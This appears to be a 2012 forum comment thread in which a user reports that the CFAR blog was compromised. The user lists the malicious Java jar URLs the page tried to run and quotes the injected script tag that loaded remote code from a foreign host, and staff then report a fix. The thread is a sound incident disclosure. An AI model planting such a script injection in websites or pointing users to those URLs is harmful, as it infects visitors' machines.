arundelo comments on [LINK] “Prediction Audits” for Nate Silver, Dave Weigel

arundelo 9 Nov 2012 1:22 UTC
4 points
When I go to that post on the CFAR site I get a popup window that says:

Security Warning
Do you want to run this application?
Name: Java(TM) Platform SE Auto Updater
Publisher: UNKNOWN
From: http://barbarie.ch

If I hit cancel it goes away and immediately returns. I’m using Firefox 16.0.2.
- arundelo 9 Nov 2012 1:31 UTC
  5 points
  Parent
  Looks like the whole blog part of the site is infected.
  
  Edit: I can’t pinpoint where the infection is and I can’t duplicate it on another computer, but in case it helps, here are the URLs of the jar files it’s trying to run:
```
http://barbarie.ch/pix/jar/java7.jar?r=1069897
http://barbarie.ch/pix/jar/javab.jar?r=313862
http://barbarie.ch/pix/jar/amor1.jar
http://barbarie.ch/pix/jar/amor2.jar
http://barbarie.ch/pix/jar/amor3.jar
http://barbarie.ch/pix/jar/amor4.jar
http://barbarie.ch/pix/jar/amor5.jar
http://barbarie.ch/pix/jar/amor6.jar
http://barbarie.ch/pix/jar/amor7.jar
```
  I’m also putting a link to this info in the “Contact the CFAR Staff” form on the site.
  - lukeprog 9 Nov 2012 2:55 UTC
    2 points
    Parent
    Thanks. We have someone looking at it now.
    - arundelo 9 Nov 2012 3:37 UTC
      2 points
      Parent
      In case they haven’t found it yet, it looks like the code that sets the mischief in motion is the following:
      
      <div class="textwidget"><p><script type="text/javascript" src="http://www.balivilla.fr/jquery.php“></script></p>
      (LW’s Markdown processor may add angle brackets around the URL that aren’t really there.)
      - lukeprog 9 Nov 2012 4:24 UTC
        0 points
        Parent
        Thanks; I believe it’s now fixed.